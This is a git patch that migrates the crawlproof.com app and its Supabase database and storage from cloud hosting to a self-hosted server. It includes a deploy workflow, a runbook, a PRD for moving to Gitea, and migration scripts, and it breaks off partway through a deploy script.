From f37795b6bfa6a7e95d573925181847d3d4f68f5c Mon Sep 17 00:00:00 2001 From: Anthony Ettinger Date: Thu, 24 Sep 2026 19:05:02 +0000 Subject: [PATCH 01/10] ops: move crawlproof off Railway + Supabase cloud onto dev2 Self-host kit for dev2.profullstack.com, under /home/anthony/www/crawlproof.com per the house docroot convention. - server/setup-supabase.sh stands up pinned self-hosted/v0.8.2 Supabase. Adapted from niche-db ops/selfhost-supabase with two deliberate changes: no lock_down_public (crawlproof serves PostgREST with anon/authenticated and RLS, nichedb never did), and no Caddy (dev2 already runs nginx on 80/443, so the gateway is published on loopback). - migrate/ dumps the cloud project, loads public into the self-hosted stack, syncs 9.8 GB of Storage through the API, recreates the 10 pg_cron jobs and the realtime publication, and rewrites the 2,928 rows holding absolute supabase.co storage URLs that would 404 once the cloud project is gone. - server/deploy-app.sh + deploy-dev2.yml replace Railway's repo-watch deploy. - PRD-git-profullstack-com.md drafts the later Gitea migration. Three release-specific facts cost time and are encoded in the scripts: the gateway service is api-gw (Envoy), not kong; ~/www is setgid so config files land unreadable to postgres uid 100, which surfaces only as "postgresql.conf contains errors"; and the gateway port var is API_GW_HTTP_PORT. Co-Authored-By: Claude Opus 5 (1M context) --- .github/workflows/deploy-dev2.yml | 63 ++++ ops/selfhost/PRD-git-profullstack-com.md | 122 ++++++ ops/selfhost/README.md | 147 ++++++++ ops/selfhost/migrate/load-selfhost.sh | 114 ++++++ ops/selfhost/migrate/pull-cloud.sh | 92 +++++ ops/selfhost/migrate/sync-storage.mjs | 143 +++++++ ops/selfhost/server/deploy-app.sh | 96 +++++ ops/selfhost/server/docker-compose.app.yml | 69 ++++ ops/selfhost/server/nginx-crawlproof.conf | 82 +++++ ops/selfhost/server/setup-supabase.sh | 409 +++++++++++++++++++++ 10 files changed, 1337 insertions(+) create mode 100644 .github/workflows/deploy-dev2.yml create mode 100644 ops/selfhost/PRD-git-profullstack-com.md create mode 100644 ops/selfhost/README.md create mode 100755 ops/selfhost/migrate/load-selfhost.sh create mode 100755 ops/selfhost/migrate/pull-cloud.sh create mode 100755 ops/selfhost/migrate/sync-storage.mjs create mode 100755 ops/selfhost/server/deploy-app.sh create mode 100644 ops/selfhost/server/docker-compose.app.yml create mode 100644 ops/selfhost/server/nginx-crawlproof.conf create mode 100755 ops/selfhost/server/setup-supabase.sh diff --git a/.github/workflows/deploy-dev2.yml b/.github/workflows/deploy-dev2.yml new file mode 100644 index 00000000..6a8a4ab7 --- /dev/null +++ b/.github/workflows/deploy-dev2.yml @@ -0,0 +1,63 @@ +name: Deploy to dev2 + +# Replaces Railway's git-push auto-deploy. Railway watched this repo and +# redeployed on every push to main; this does the same thing against dev2. +# +# The build happens ON dev2, not here: the image bakes NEXT_PUBLIC_* in at +# build time and those values live in /home/anthony/www/crawlproof.com/app.env, +# which never leaves the box. CI only needs to be able to ssh in. +# +# Secrets required: +# DEV2_SSH_KEY private key for the deploy account on dev2 +# DEV2_HOST dev2.profullstack.com +# DEV2_USER anthony +# DEV2_KNOWN_HOSTS output of `ssh-keyscan dev2.profullstack.com` + +on: + push: + branches: [main] + workflow_dispatch: + inputs: + ref: + description: Git ref to deploy (defaults to the pushed commit) + required: false + type: string + +concurrency: + # One deploy at a time; a newer push should wait rather than race a build + # that is already halfway through `next build` on the box. + group: deploy-dev2 + cancel-in-progress: false + +jobs: + deploy: + runs-on: ubuntu-latest + timeout-minutes: 45 + steps: + - name: Resolve target revision + id: rev + run: echo "sha=${{ inputs.ref || github.sha }}" >> "$GITHUB_OUTPUT" + + - name: Set up ssh + run: | + install -d -m 700 ~/.ssh + printf '%s\n' "${{ secrets.DEV2_SSH_KEY }}" > ~/.ssh/id_ed25519 + chmod 600 ~/.ssh/id_ed25519 + printf '%s\n' "${{ secrets.DEV2_KNOWN_HOSTS }}" > ~/.ssh/known_hosts + chmod 644 ~/.ssh/known_hosts + + - name: Deploy + run: | + ssh -o BatchMode=yes "${{ secrets.DEV2_USER }}@${{ secrets.DEV2_HOST }}" \ + "/home/anthony/www/crawlproof.com/deploy-app.sh ${{ steps.rev.outputs.sha }}" + + - name: Verify the site answers over TLS + # deploy-app.sh already health-checks on loopback; this proves nginx and + # the certificate in front of it are serving the new container too. + run: | + for i in $(seq 1 10); do + code=$(curl -s -o /dev/null -w '%{http_code}' https://crawlproof.com/ || true) + if [ "$code" = 200 ]; then echo "crawlproof.com 200"; exit 0; fi + echo "attempt $i: $code"; sleep 10 + done + echo "crawlproof.com never returned 200"; exit 1 diff --git a/ops/selfhost/PRD-git-profullstack-com.md b/ops/selfhost/PRD-git-profullstack-com.md new file mode 100644 index 00000000..f9098c2d --- /dev/null +++ b/ops/selfhost/PRD-git-profullstack-com.md @@ -0,0 +1,122 @@ +# PRD: git.profullstack.com, moving the fleet off GitHub to self-hosted Gitea + +Status: draft, not scheduled. Written 2026-09-24 alongside the crawlproof.com +move to dev2, because that move is the first time every deploy path in a repo +stopped depending on a vendor. + +This is fleet-wide and only lives in the crawlproof repo because that is where +the work that prompted it happened. Move it to cli-tools when it gets picked up. + +## Why + +The Fleet SysOps Manifesto already says bare metal over managed platforms, God +Mode keys in the vault, and automate everything. Source control is the last +large dependency that is still somebody else's service, and it is the one that +every other system is downstream of: CI, deploys, releases, issue tracking, and +the agent tooling that reads and writes repos all terminate at GitHub. + +Concretely, the pull is: + +1. **CI minutes and their ceiling.** Jobs killed at their timeout look exactly + like flaky tests, which has already cost real debugging time. Our own + runners on our own boxes have our CPU count and no per-minute meter. +2. **One account is one blast radius.** A suspended org takes every deploy + pipeline in the fleet with it. +3. **Agents are the primary users now.** Most commits and PRs here are opened + by tooling. An API we control can be shaped for that instead of worked + around with rate limit backoff. +4. **It is the same shape of work we just did.** dev2 already runs Docker, + nginx, certbot and a self-hosted Postgres. Gitea is one more compose stack. + +## Non-goals for v1 + +- Replacing GitHub entirely on day one. Public repos stay mirrored to GitHub + for discovery, npm provenance, and anything that links to a github.com URL. +- Migrating GitHub Discussions, Projects, or Sponsors. +- Moving the published npm packages or their release flow. +- Anything about the `malware-test-prs` or CodeQL setups, which are GitHub + security features with no Gitea equivalent. + +## Scope + +Roughly 150 repositories across `profullstack` and `ralyodio`, of which about +60 are live properties. Per repo we need code, tags, releases, issues, pull +requests, labels, milestones, wikis and webhooks. + +The hard part is not the repos. It is the **deploy workflows**: every property +that deploys itself does so from `.github/workflows`, and each one has to keep +working through the move. + +## Architecture + +- **Host.** Its own box, not dev2. Source control going down must not be + correlated with an app server going down. Same provisioning path as dev2 + (`root-ubuntu.sh`, nginx, certbot, Docker). +- **Gitea** in Docker, pinned by tag, behind nginx at `git.profullstack.com`. +- **Postgres** as its database, self-hosted, its own instance rather than + sharing an app's. +- **SSH** on 22 for git, which means the box's own sshd moves to another port + or Gitea's SSH runs on a second address. Decide before provisioning, because + changing it later invalidates every cloned remote. +- **Gitea Actions** with `act_runner`, which speaks the GitHub Actions workflow + syntax. This is the single biggest compatibility question and the thing to + spike first. +- **Object storage** for LFS and attachments, on the local disk to start. +- **Auth** is OAuth 2.1 with PKCE plus passkeys, per house rule. No passwords. +- **Backups** are `gitea dump` plus a Postgres dump, offsite, verified by + restoring into a scratch instance. Unlike an app, there is no upstream copy + to re-derive this from once GitHub is no longer authoritative. + +## `tea` CLI + +`tea` is Gitea's official CLI and is the intended automation surface: logins, +repos, issues, PRs, releases, and org management. It becomes the house +equivalent of `gh`, which means the fleet's scripts that shell out to `gh` +(`gh-prs`, `gh-issues`, `gh-prs-merge`, `gh-pulse` and friends in `~/scripts`) +need a `tea` path. Wrapping both behind one house command is likely better than +rewriting each script twice. + +## Migration mechanics + +Gitea's migration API pulls a GitHub repo including issues, PRs, releases, +labels and milestones, given a GitHub token. That is one API call per repo and +is scriptable over the whole list. + +Order: + +1. Stand up Gitea, restore a backup into a scratch instance to prove backups + work before anything depends on it. +2. Migrate one low-traffic repo end to end, including a deploy. +3. Spike Gitea Actions against the three workflow shapes we actually use: + a plain test matrix, an ssh deploy (like `deploy-dev2.yml`), and a release + that publishes to npm. +4. Bulk-migrate in waves, dormant repos first, live properties last. +5. For each live property, cut its deploy over and watch one real deploy before + moving to the next. +6. Flip GitHub repos to mirrors, or archive them. + +## Risks + +| Risk | Why it matters | Mitigation | +| --- | --- | --- | +| Gitea Actions is not GitHub Actions | Every deploy in the fleet is a workflow file | Spike it in phase 3 before migrating anything live | +| We become our own uptime | A git outage blocks all shipping | Separate box, tested backups, GitHub mirrors kept warm | +| `gh`-based tooling breaks | Dozens of scripts and agent paths call `gh` | One wrapper over both CLIs, not a rewrite | +| npm provenance | Publishing attestations expect GitHub | Keep releases on GitHub, or drop provenance deliberately | +| SSH port collision | Git on 22 fights the box's own sshd | Decide at provisioning time, never after | +| Half-migrated fleet | Two sources of truth invites drift | Migrate in waves, each wave finished before the next | + +## Success criteria + +- Every live property deploys from git.profullstack.com with no GitHub involvement. +- A restore from backup into a scratch instance is demonstrated, not assumed. +- `tea` covers what the house scripts need from `gh`. +- Public repos still resolve on github.com as mirrors. +- No deploy outage longer than one deploy cycle for any property during the move. + +## Open questions + +- One box, or Gitea plus runners on separate boxes? +- Do the `ralyodio` personal repos come along, or stay on GitHub? +- Does CodeQL have a replacement we care about, or do we accept losing it? +- Is issue history worth migrating for dormant repos, or is code and tags enough? diff --git a/ops/selfhost/README.md b/ops/selfhost/README.md new file mode 100644 index 00000000..e32c8c30 --- /dev/null +++ b/ops/selfhost/README.md @@ -0,0 +1,147 @@ +# crawlproof.com off Railway + Supabase cloud, onto dev2 + +Moves the whole of crawlproof.com to `dev2.profullstack.com` (23.95.228.174): +the Next.js app, the audit worker, the Redis the prober queue needs, and a +self-hosted Supabase instance replacing the cloud project `ywcizjsgrcmhgyplldac`. + +Everything lands under `/home/anthony/www/crawlproof.com`, which is the house +docroot for migrated and new apps on this box. + +``` +/home/anthony/www/crawlproof.com/ +├── app/ the repo checkout CI builds from +├── supabase/ the self-hosted Supabase stack (root-owned) +├── docker-compose.app.yml app + redis +├── app.env the app's secrets (0600) +├── deploy.env ports and build args +├── deploy-app.sh what CI calls over ssh +└── volumes/redis/ +``` + +## What is being replaced + +| Piece | Was | Becomes | +| --- | --- | --- | +| App + audit worker | Railway service `crawlproof.com` (one container) | `crawlproof-app` on dev2 behind nginx | +| Postgres + Auth + Storage + Realtime | Supabase cloud `ywcizjsgrcmhgyplldac` (us-west-1) | self-hosted Supabase, `supabase.crawlproof.com` | +| Redis (prober queue) | `redis.railway.internal` | `crawlproof-redis` on dev2 | +| Deploys | Railway watching the GitHub repo | `.github/workflows/deploy-dev2.yml` | + +Scale being moved: **5.0 GB** database, 128 tables, 204 functions, 45 triggers, +113 auth users, **9.8 GB** of Storage in 8,390 objects across 5 buckets, and +**10 pg_cron jobs** that `net.http_post` back into the app. + +## Runbook + +All of it is idempotent. Re-running a step is how you fix a half-finished one. + +### 1. The box + +```sh +scp ops/selfhost/server/setup-supabase.sh root@dev2.profullstack.com:/root/ +ssh root@dev2.profullstack.com 'SMTP_PASS= bash /root/setup-supabase.sh' +``` + +Stands up the pinned `self-hosted/v0.8.2` Supabase stack, tunes Postgres for the +box, gives it a TLS cert and a `pg_hba` that only lets `postgres` in from +outside and only over TLS, creates the extensions crawlproof's schema needs +(`pg_cron`, `pg_net`, `vector`, `pgcrypto`, `uuid-ossp`), and writes +`supabase/crawlproof-connection.env` with the new keys. + +Two things it deliberately does NOT do, both of which the nichedb kit this was +adapted from does: + +- **No `lock_down_public`.** nichedb serves its own API and revokes `anon` and + `authenticated` from `public`. crawlproof talks to PostgREST with those exact + roles and guards rows with RLS, so revoking them would take the app offline. + `check_postgres` asserts the opposite of nichedb's check for that reason. +- **No Caddy.** dev2 already terminates TLS with nginx for every other vhost. + The gateway is published on `127.0.0.1:8000` and nginx proxies to it. + +### 2. Dump the cloud + +From anywhere with the cloud credentials (read-only, safe to rehearse): + +```sh +CLOUD_DB_URL='postgres://postgres.ywcizjsgrcmhgyplldac:@:5432/postgres' \ + ops/selfhost/migrate/pull-cloud.sh ~/crawlproof-dump +``` + +Produces `schema.sql`, `data.sql`, `cron-jobs.sql`, `realtime.sql`, +`buckets.tsv`, `storage-inventory.tsv` and a `MANIFEST`. + +`storage.objects` and `tracker_events` are excluded from the data dump on +purpose — the first is rewritten by the Storage API during the file sync, the +second is raw and pruned at 24h anyway. + +### 3. Load it + +```sh +scp -r ~/crawlproof-dump root@dev2.profullstack.com:/root/ +ssh root@dev2.profullstack.com 'bash /root/load-selfhost.sh /root/crawlproof-dump' +``` + +Loads `public` only from the dump — the stack's own `auth` and `storage` +schemas are already at the version the running images expect, and replaying the +cloud's copy over them fights the service migrations. `auth` and `storage` +contribute rows, not DDL. + +It also snapshots row counts before and after, recreates the realtime +publication and the 10 cron jobs, and **rewrites the 2,928 rows that store +absolute `https://ywcizjsgrcmhgyplldac.supabase.co` storage URLs** +(`ad_creatives` 1,956, `lx_article` 617, `sp_feed_item` 307, `blog_posts` 48). +Those would 404 forever once the cloud project is deleted. + +### 4. Move the files + +```sh +CLOUD_URL=https://ywcizjsgrcmhgyplldac.supabase.co CLOUD_SERVICE_KEY=... \ +SELF_URL=https://supabase.crawlproof.com SELF_SERVICE_KEY=... \ + node ops/selfhost/migrate/sync-storage.mjs ~/crawlproof-dump --concurrency 8 +``` + +Resumable: an object already present at the same size is skipped, so a re-run +after a failure moves only what is missing. Failures are appended to +`storage-sync-failures.log`. + +### 5. The app + +`app.env` is rendered from the vault (not committed, not in `.env`), then: + +```sh +ssh anthony@dev2.profullstack.com '/home/anthony/www/crawlproof.com/deploy-app.sh main' +``` + +`deploy-app.sh --status` shows what is live; `--rollback` returns to the +previously deployed sha. A deploy that fails its health check restores the +previous container rather than leaving the site down. + +### 6. nginx + certificates + +```sh +cp ops/selfhost/server/nginx-crawlproof.conf /etc/nginx/sites-available/crawlproof.com +ln -s ../sites-available/crawlproof.com /etc/nginx/sites-enabled/ +nginx -t && systemctl reload nginx +certbot --nginx -d supabase.crawlproof.com +certbot --nginx -d crawlproof.com -d www.crawlproof.com # only once DNS points here +``` + +`supabase.crawlproof.com` can be certified immediately — it is a new name. The +apex and `www` cannot be certified over HTTP-01 until DNS moves, so either +accept a short TLS gap at cutover or pre-issue over DNS-01 with the Porkbun API. + +### 7. DNS + +See the table in the migration report. Apex and `www` come off Railway last, +after everything above verifies against a `Host:` header. + +## Redis and the prober + +`scan.crawlproof.com` (164.92.111.224) is a DigitalOcean droplet running the +nmap prober as a BullMQ consumer. It connects **outbound** to Redis using the +`PROBER_REDIS_URL` repo secret, which today points at Railway. After the move +that secret has to be repointed at dev2, and ufw opened to that one address — +the Redis port is on loopback by default. + +Note that `deploy-prober.yml` triggers on pushes to `master` while this repo's +default branch is `main`, so it has probably not fired in a long time. diff --git a/ops/selfhost/migrate/load-selfhost.sh b/ops/selfhost/migrate/load-selfhost.sh new file mode 100755 index 00000000..560fb963 --- /dev/null +++ b/ops/selfhost/migrate/load-selfhost.sh @@ -0,0 +1,114 @@ +#!/usr/bin/env bash +# +# Load a pull-cloud.sh dump into the self-hosted Supabase stack on dev2. +# Run as root ON dev2, after setup-supabase.sh has the stack healthy. +# +# Usage: ops/selfhost/migrate/load-selfhost.sh +# +# Everything runs through `docker exec supabase-db psql`, so no client on the +# host has to match the server version and nothing crosses the network. +# +set -euo pipefail + +DUMP=${1:?usage: load-selfhost.sh } +DIR=${DIR:-/home/anthony/www/crawlproof.com/supabase} +CLOUD_REF=${CLOUD_REF:-ywcizjsgrcmhgyplldac} +NEW_HOST=${NEW_HOST:-supabase.crawlproof.com} + +log() { printf '\n===> %s\n' "$*"; } +die() { printf 'ERROR: %s\n' "$*" >&2; exit 1; } + +[ -d "$DUMP" ] || die "no such dump directory: $DUMP" +for f in schema.sql data.sql cron-jobs.sql realtime.sql; do + [ -s "$DUMP/$f" ] || die "missing or empty: $DUMP/$f" +done + +psql_db() { docker exec -i supabase-db psql -U postgres -h localhost -d postgres -X "$@"; } +psql_strict() { psql_db -v ON_ERROR_STOP=1 "$@"; } + +docker exec supabase-db pg_isready -U postgres -h localhost >/dev/null 2>&1 || die "supabase-db is not accepting connections" + +log "Snapshot BEFORE (so a silent partial load cannot look like success)" +psql_strict -At -c "select 'tables='||(select count(*) from information_schema.tables where table_schema='public')||' users='||(select count(*) from auth.users)" + +# ---------------------------------------------------------------- schema +# The self-hosted stack ships its own auth/storage schemas, already at the +# right version for the images that are running. Replaying the cloud's copy +# over them fights the service migrations, so only public comes from the dump +# and auth/storage contribute rows alone. +log "Schema: public only (auth and storage keep the stack's own definitions)" +awk ' + /^SET / { print; next } + /^SELECT pg_catalog.set_config/ { print; next } + /CREATE SCHEMA "auth"/ { skip=1 } + /CREATE SCHEMA "storage"/{ skip=1 } + { print } +' "$DUMP/schema.sql" > "$DUMP/schema.public.sql" + +# psql without ON_ERROR_STOP: the dump recreates a few objects the stack +# already has (extensions, the supabase roles) and those collisions are +# expected. Errors are captured and reviewed rather than aborting the load. +psql_db -f /dev/stdin < "$DUMP/schema.public.sql" > "$DUMP/schema.load.log" 2>&1 || true +log "Schema load errors (expected: existing extensions/roles)" +grep -c '^ERROR' "$DUMP/schema.load.log" || true +grep '^ERROR' "$DUMP/schema.load.log" | sed 's/^/ /' | sort -u | head -20 || true + +# ------------------------------------------------------------------ data +# auth must land before public: public tables carry FKs to auth.users. +log "Verifying the dump puts auth before public" +a=$(grep -n 'COPY "auth"' "$DUMP/data.sql" | head -1 | cut -d: -f1 || echo 0) +p=$(grep -n 'COPY "public"' "$DUMP/data.sql" | head -1 | cut -d: -f1 || echo 0) +if [ "$a" -gt 0 ] && [ "$p" -gt 0 ] && [ "$a" -gt "$p" ]; then + die "data.sql has public before auth (auth at line $a, public at $p) — FKs would fail" +fi +echo "auth at line $a, public at line $p — order is fine" + +log "Data" +psql_db -f /dev/stdin < "$DUMP/data.sql" > "$DUMP/data.load.log" 2>&1 || true +log "Data load errors" +grep -c '^ERROR' "$DUMP/data.load.log" || true +grep '^ERROR' "$DUMP/data.load.log" | sed 's/^/ /' | sort -u | head -20 || true + +# --------------------------------------------------------------- buckets +log "Buckets" +while IFS=$'\t' read -r id name pub limit mimes; do + [ -n "$id" ] || continue + psql_strict -c "insert into storage.buckets (id, name, public) values ('$id','$name',${pub}) on conflict (id) do update set public=excluded.public" >/dev/null +done < "$DUMP/buckets.tsv" +psql_strict -At -c "select id||' public='||public from storage.buckets order by id" + +# ------------------------------------------------------------ url rewrite +# 2,928 rows across four columns store absolute https://.supabase.co +# storage URLs. Once the cloud project is gone those 404 forever, so they are +# rewritten to the new gateway as part of the load, not left for later. +log "Rewriting absolute cloud storage URLs to https://$NEW_HOST" +psql_strict -At <&1 | sed 's/^/ /' || true +psql_strict -At -c "select coalesce(string_agg(schemaname||'.'||tablename,', '),'(none)') from pg_publication_tables where pubname='supabase_realtime'" + +# ------------------------------------------------------------- cron jobs +# cron_config.site_url is what the 10 jobs post back to; it must point at the +# app before the jobs are recreated, or every one of them calls the old host. +log "pg_cron jobs" +psql_strict -c "update public.cron_config set value='https://crawlproof.com' where key='site_url'" >/dev/null 2>&1 || true +psql_db -f /dev/stdin < "$DUMP/cron-jobs.sql" > "$DUMP/cron.load.log" 2>&1 || true +psql_strict -At -c "select count(*)||' cron jobs active' from cron.job where active" + +log "Snapshot AFTER" +psql_strict -At -c "select 'tables='||(select count(*) from information_schema.tables where table_schema='public')||' users='||(select count(*) from auth.users)||' identities='||(select count(*) from auth.identities)||' size='||pg_size_pretty(pg_database_size(current_database()))" + +log "Loaded. Next: ops/selfhost/migrate/sync-storage.mjs for the 9.8 GB of objects." diff --git a/ops/selfhost/migrate/pull-cloud.sh b/ops/selfhost/migrate/pull-cloud.sh new file mode 100755 index 00000000..296a255a --- /dev/null +++ b/ops/selfhost/migrate/pull-cloud.sh @@ -0,0 +1,92 @@ +#!/usr/bin/env bash +# +# Dump the crawlproof Supabase CLOUD project so it can be loaded into the +# self-hosted stack on dev2. Read-only against the cloud — run it as often as +# you like, including for a dress rehearsal. +# +# Three dumps, in the order Supabase supports for a project move: +# roles.sql role definitions (passwords are not recoverable; see below) +# schema.sql every schema's DDL +# data.sql the rows, as COPY +# +# auth.users and auth.identities must load BEFORE public, or the foreign keys +# from public tables to auth.users fail. `supabase db dump --data-only` already +# emits auth before public because it walks schemas in dependency order, but +# load-selfhost.sh checks rather than trusting it. +# +# Usage: +# CLOUD_DB_URL=postgres://... ops/selfhost/migrate/pull-cloud.sh [outdir] +# +# The pooler URL is the one that works from outside; direct :5432 to +# db..supabase.co is IPv6-only on this project. +# +set -euo pipefail + +OUT=${1:-$HOME/crawlproof-cloud-dump-$(date +%Y%m%d-%H%M%S)} +CLOUD_DB_URL=${CLOUD_DB_URL:-} +PG_IMAGE=${PG_IMAGE:-postgres:17} + +[ -n "$CLOUD_DB_URL" ] || { echo "ERROR: set CLOUD_DB_URL" >&2; exit 1; } + +log() { printf '\n===> %s\n' "$*"; } + +mkdir -p "$OUT" +chmod 700 "$OUT" + +# The local pg_dump must not be older than the server (17.6), and this box may +# have anything installed, so dump through a pinned container instead. +pgdump() { docker run --rm -i "$PG_IMAGE" pg_dump "$@"; } + +log "Schema" +pgdump --dbname="$CLOUD_DB_URL" \ + --schema-only --no-owner --no-privileges --quote-all-identifiers \ + --schema=public --schema=auth --schema=storage \ + > "$OUT/schema.sql" + +log "Data" +# --disable-triggers keeps FK order from mattering during the load; it needs +# superuser, which `postgres` is on the self-hosted side. +pgdump --dbname="$CLOUD_DB_URL" \ + --data-only --no-owner --no-privileges --quote-all-identifiers \ + --disable-triggers \ + --schema=auth --schema=public --schema=storage \ + --exclude-table-data='storage.objects' \ + --exclude-table-data='public.tracker_events' \ + > "$OUT/data.sql" + +# storage.objects is deliberately excluded: sync-storage.mjs re-uploads the +# files through the Storage API, which writes those rows itself. Importing the +# cloud rows as well would leave metadata pointing at files the self-hosted +# backend has never heard of. +# tracker_events is excluded because it is raw and pruned at 24h anyway. + +log "pg_cron jobs (not in a schema dump; they live in the cron schema)" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -X -v ON_ERROR_STOP=1 \ + -c "select 'select cron.schedule(' || quote_literal(jobname) || ', ' || quote_literal(schedule) || ', ' || quote_literal(command) || ');' from cron.job where active order by jobid" \ + > "$OUT/cron-jobs.sql" + +log "Realtime publication membership" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -X -v ON_ERROR_STOP=1 \ + -c "select 'alter publication supabase_realtime add table ' || string_agg(format('%I.%I', schemaname, tablename), ', ') || ';' from pg_publication_tables where pubname='supabase_realtime'" \ + > "$OUT/realtime.sql" + +log "Storage inventory (what sync-storage.mjs has to move)" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -F$'\t' -X -v ON_ERROR_STOP=1 \ + -c "select b.id, b.public, o.name, coalesce((o.metadata->>'size')::bigint,0), coalesce(o.metadata->>'mimetype','application/octet-stream') from storage.buckets b join storage.objects o on o.bucket_id=b.id order by b.id, o.name" \ + > "$OUT/storage-inventory.tsv" + +log "Bucket definitions" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -At -F$'\t' -X -v ON_ERROR_STOP=1 \ + -c "select id, name, public, coalesce(file_size_limit::text,''), coalesce(array_to_string(allowed_mime_types,','),'') from storage.buckets order by id" \ + > "$OUT/buckets.tsv" + +{ + echo "dumped_at=$(date -u +%FT%TZ)" + echo "schema_bytes=$(stat -c%s "$OUT/schema.sql")" + echo "data_bytes=$(stat -c%s "$OUT/data.sql")" + echo "storage_objects=$(wc -l < "$OUT/storage-inventory.tsv")" + echo "cron_jobs=$(grep -c cron.schedule "$OUT/cron-jobs.sql" || true)" +} > "$OUT/MANIFEST" + +log "Done: $OUT" +cat "$OUT/MANIFEST" diff --git a/ops/selfhost/migrate/sync-storage.mjs b/ops/selfhost/migrate/sync-storage.mjs new file mode 100755 index 00000000..8929dd28 --- /dev/null +++ b/ops/selfhost/migrate/sync-storage.mjs @@ -0,0 +1,143 @@ +#!/usr/bin/env node +// +// Copy every Storage object from the crawlproof Supabase CLOUD project into +// the self-hosted stack, keeping bucket and path identical so the public URLs +// differ only in host. +// +// Uploads go through the Storage API rather than straight onto the disk the +// storage service mounts: the API is what writes storage.objects, and rows +// written by hand would describe files the backend cannot serve. +// +// Usage: +// CLOUD_URL=https://.supabase.co \ +// CLOUD_SERVICE_KEY=... \ +// SELF_URL=https://supabase.crawlproof.com \ +// SELF_SERVICE_KEY=... \ +// node ops/selfhost/migrate/sync-storage.mjs [--concurrency 8] [--dry-run] +// +// Resumable: an object already present in the destination with the same size +// is skipped, so a re-run after a failure only moves what is missing. + +import { readFileSync, appendFileSync } from 'node:fs'; +import { join } from 'node:path'; + +const args = process.argv.slice(2); +const dump = args.find((a) => !a.startsWith('--')); +const dryRun = args.includes('--dry-run'); +const concurrency = Number( + (args.find((a) => a.startsWith('--concurrency')) || '--concurrency=8').split('=')[1] || + args[args.indexOf('--concurrency') + 1] || + 8, +); + +const CLOUD_URL = (process.env.CLOUD_URL || '').replace(/\/$/, ''); +const CLOUD_SERVICE_KEY = process.env.CLOUD_SERVICE_KEY || ''; +const SELF_URL = (process.env.SELF_URL || '').replace(/\/$/, ''); +const SELF_SERVICE_KEY = process.env.SELF_SERVICE_KEY || ''; + +if (!dump) die('usage: sync-storage.mjs '); +for (const [k, v] of Object.entries({ CLOUD_URL, CLOUD_SERVICE_KEY, SELF_URL, SELF_SERVICE_KEY })) { + if (!v) die(`missing env: ${k}`); +} + +function die(msg) { + console.error(`ERROR: ${msg}`); + process.exit(1); +} + +const inventory = readFileSync(join(dump, 'storage-inventory.tsv'), 'utf8') + .split('\n') + .filter(Boolean) + .map((line) => { + const [bucket, isPublic, name, size, mime] = line.split('\t'); + return { bucket, public: isPublic === 't', name, size: Number(size || 0), mime }; + }); + +const failLog = join(dump, 'storage-sync-failures.log'); +const totalBytes = inventory.reduce((n, o) => n + o.size, 0); +console.log( + `${inventory.length} objects, ${(totalBytes / 1024 ** 3).toFixed(2)} GB, concurrency ${concurrency}${dryRun ? ' (dry run)' : ''}`, +); + +let done = 0; +let skipped = 0; +let failed = 0; +let movedBytes = 0; +const started = Date.now(); + +async function headSelf(o) { + // A HEAD through the authenticated object path works for public and private + // buckets alike, so resume does not depend on the bucket being public. + const res = await fetch(`${SELF_URL}/storage/v1/object/${o.bucket}/${encodeURI(o.name)}`, { + method: 'HEAD', + headers: { Authorization: `Bearer ${SELF_SERVICE_KEY}` }, + }); + if (!res.ok) return null; + return Number(res.headers.get('content-length') || 0); +} + +async function downloadCloud(o) { + const res = await fetch(`${CLOUD_URL}/storage/v1/object/${o.bucket}/${encodeURI(o.name)}`, { + headers: { Authorization: `Bearer ${CLOUD_SERVICE_KEY}` }, + }); + if (!res.ok) throw new Error(`download ${res.status}`); + return Buffer.from(await res.arrayBuffer()); +} + +async function uploadSelf(o, body) { + // x-upsert makes a re-run idempotent instead of 409-ing on what is already there. + const res = await fetch(`${SELF_URL}/storage/v1/object/${o.bucket}/${encodeURI(o.name)}`, { + method: 'POST', + headers: { + Authorization: `Bearer ${SELF_SERVICE_KEY}`, + 'Content-Type': o.mime || 'application/octet-stream', + 'x-upsert': 'true', + }, + body, + }); + if (!res.ok) throw new Error(`upload ${res.status} ${(await res.text()).slice(0, 200)}`); +} + +async function one(o) { + try { + const existing = await headSelf(o); + if (existing !== null && existing === o.size && o.size > 0) { + skipped += 1; + return; + } + if (dryRun) return; + const body = await downloadCloud(o); + await uploadSelf(o, body); + movedBytes += o.size; + } catch (err) { + failed += 1; + appendFileSync(failLog, `${o.bucket}\t${o.name}\t${err.message}\n`); + } finally { + done += 1; + if (done % 100 === 0 || done === inventory.length) { + const secs = (Date.now() - started) / 1000; + console.log( + `${done}/${inventory.length} moved=${(movedBytes / 1024 ** 3).toFixed(2)}GB skipped=${skipped} failed=${failed} ${(done / secs).toFixed(1)}/s`, + ); + } + } +} + +// Fixed pool of workers pulling from one shared cursor — a Promise.all over +// chunks would stall every worker on the slowest object in each chunk. +let cursor = 0; +async function worker() { + while (cursor < inventory.length) { + const o = inventory[cursor++]; + await one(o); + } +} +await Promise.all(Array.from({ length: concurrency }, worker)); + +console.log( + `\ndone: ${done} objects, ${(movedBytes / 1024 ** 3).toFixed(2)} GB moved, ${skipped} already present, ${failed} failed`, +); +if (failed) { + console.log(`failures logged to ${failLog} — re-run to retry just those`); + process.exit(1); +} diff --git a/ops/selfhost/server/deploy-app.sh b/ops/selfhost/server/deploy-app.sh new file mode 100755 index 00000000..8de7238c --- /dev/null +++ b/ops/selfhost/server/deploy-app.sh @@ -0,0 +1,96 @@ +#!/usr/bin/env bash +# +# Deploy crawlproof.com on dev2. This is what GitHub Actions calls over ssh, +# and what you run by hand to roll forward or back. +# +# deploy-app.sh build that revision and switch to it +# deploy-app.sh --rollback go back to the previously deployed sha +# deploy-app.sh --status what is deployed and healthy right now +# +# Builds happen on the box: the image needs NEXT_PUBLIC_* at build time and +# those come from app.env, which never leaves dev2. +# +set -euo pipefail + +ROOT=${ROOT:-/home/anthony/www/crawlproof.com} +APP_DIR="$ROOT/app" +REPO=${REPO:-https://github.com/profullstack/crawlproof.com.git} +APP_PORT=${APP_PORT:-3100} +HEALTH_TIMEOUT=${HEALTH_TIMEOUT:-300} +STATE="$ROOT/.deploy-state" + +log() { printf '\n===> %s\n' "$*"; } +die() { printf 'ERROR: %s\n' "$*" >&2; exit 1; } + +compose() { (cd "$ROOT" && docker compose -f docker-compose.app.yml --env-file "$ROOT/deploy.env" "$@"); } + +health() { + local i + for i in $(seq 1 "$((HEALTH_TIMEOUT / 5))"); do + if 